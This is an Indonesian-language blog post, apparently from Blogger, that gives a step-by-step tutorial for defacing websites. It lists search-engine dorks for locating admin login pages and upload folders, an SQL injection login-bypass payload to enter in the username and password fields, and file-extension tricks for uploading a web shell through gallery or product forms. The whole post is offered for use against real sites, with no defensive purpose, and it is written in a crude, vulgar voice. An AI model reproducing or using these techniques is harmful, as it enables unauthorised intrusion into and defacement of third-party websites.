DEFACE METODE BYPASS ADMIN


Halo gaes...
kembali dengan saya admin terkece di dunia aseekk.
kali ini gw mau kasih tutorial cara deface teknik bypass admin.
langsung aja gausah banyak bacot.

# bahan :
  • Dork :
    - inurl:/admin/uploads index of site:(use ur brain!)
    - inurl:/admin/images intext:"Parent Dicertory"
    - intext:"username" intitle:"login"
    - intitle:"administrator" inurl:/login.php
    - dan kembangin lagi dengan otak kalean yang penuh dengan javfilm
  • Script(kurasa semua udah pada punya script kan).
  • Shell : touch me madafaka!

    # langkah :
    1. buka dork na.
    2. kalo udah masuk isi form loginnya.
    3. untuk mengisi "username & password" nya coba isi dengan ini :
  • Username : '=''or'
  • Password : '=''or'
    4. "kalo vuln berarti langsung redirect ke dashboard adminnya"
    5. kalo udh bisa masuk ke dashboard adminnya, kalean bisa upload shell disana.
    ( ext shell : .php.xxxjpeg , shell.jpg.PhP , shell.php3 atau shell.php5 dll)
    6. biasanya tempat upload shell itu terletak pada
  • Gallery
  • Product ( biasanya pake Bypass JSOverlay )
  • Add Admin
  • DLL

  • *terimakasih atas perhatiannya mohon maaf kalo ada salah kata tulis ea*
    ~Admin

    No comments

    Powered by Blogger.